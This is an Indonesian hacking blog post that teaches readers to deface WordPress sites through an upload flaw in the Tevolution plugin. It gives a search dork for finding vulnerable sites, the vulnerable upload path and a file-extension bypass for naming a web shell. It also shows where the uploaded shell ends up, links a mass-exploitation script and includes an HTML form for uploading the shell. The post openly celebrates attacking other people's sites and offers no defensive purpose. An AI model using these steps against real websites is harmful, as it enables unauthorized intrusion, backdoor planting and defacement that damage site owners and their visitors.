Monday, 9 May 2016

Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter

Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter tool buatan IndoXploit *exploitnya lagi booming nih dikalangan dispenser :3 *yang dah expert minggir dlu beb ;*
Exploit ini adalah salah satu bug/celah yg terdapat pada plugins CMS WordPress.


Langsung Intip tutorialnya ;*
Dork:
inurl:"/wp-content/plugins/Tevolution/"
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)


1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.


exploit: /[path]/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. Vulnerability ~ Blank


kurang lebih sih gitu~ akwkwa :v

Kumpulin dulu semua target yang vuln, kalo dah banyak waktunya proses auto tanem shell menggunakan Mass Xploiter buatan tim IndoXploit..
disini gua dh tanem toolnya di web org.
Klik disitu -> Dont touch Me Senpai :')



Shell name: nuenomaru bisa di ganti dgn sesukalu.php.xxxjpg
*pada exploit ini kita manfaatkan bypass ekstensi shell..

pada kolom Target, pastekan target2 yg pgn ente tusb0l.
Lalu Klik Hajar! , makan akan secara otomatis akan muncul letak shell ente..
lalu klik deh :




file/shell akses: /wp-content/uploads/thn/bln/namashell.php.xxxjpg

disini script Mass Auto xploiter Plugins Tevolution -> http://pastebin.com/9SCkGP3h

cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy deface ^_^

CSRF:

<form
action="target.coli/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and Big thanks to: blog indoXploit




./Nuenomaru





tidak perlu muncul ke permukaan , yang penting tetap bergerilya












Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


EmoticonEmoticon